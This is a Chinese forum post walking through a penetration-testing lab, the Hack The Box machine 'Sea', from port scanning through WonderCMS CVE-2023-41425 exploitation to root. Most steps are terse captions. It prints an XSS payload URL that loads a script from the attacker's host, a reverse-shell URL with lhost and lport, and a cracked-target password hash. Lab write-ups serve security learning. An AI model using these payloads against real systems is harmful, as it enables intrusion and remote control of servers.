记一次渗透测试实战之Sea
vghost 发表于 北京 渗透测试 996浏览 · 2024-12-31 06:47

Web渗透

端口扫描

使用nmap进行端口探测

发现存在22和80端口开放。

访问80端口,然后使用F12查看源代码。

目录爆破

接着使用工具爆破目录
发现存在一些 目录。
访问README.MD,发现是WonderCMS

CVE搜索

使用浏览器搜索,发现存在CVE漏洞。

访问contact.PHP.

SSRF漏洞

测试功能点。

发现存在SSRF漏洞。

CVE-2023-41425

接着访问index.php?目录

漏洞尝试

http://sea.htb/index.php?page=loginURL"></form><script src="http://10.10.16.3:8000/xss.js"></script><form action="

使用exp.py脚本尝试,发现未能攻击成功。

访问发现不能成功利用。
http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.16.3&lport=4444

查看JS文件。

获取Webshell

修改之后,重新尝试,成功获取shell。

获取交互式SHELL。

横向移动

内网信息收集

然后进行内网信息收集。

查看/etc/passwd

查看数据库文件。

查看目录。

获取数据库文件

测试localhost

查看数据库文件,获取password。

hash解密

"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
使用hashcat解密,获取密码。

接着使用netexec验证ssh吗密码。

ssh登录

使用SU进行切换。

代理搭建

接着搭建代理。

搭建客户端。

访问web站点。

漏洞尝试

发现可以进行文件读取。

文件读取

然后读/etc/password

测试发现存在SQL注入

确定分组权限。

获取root权限

然后添加用户到管理员组,获取root权限。

0 条评论
某人
表情
可输入 255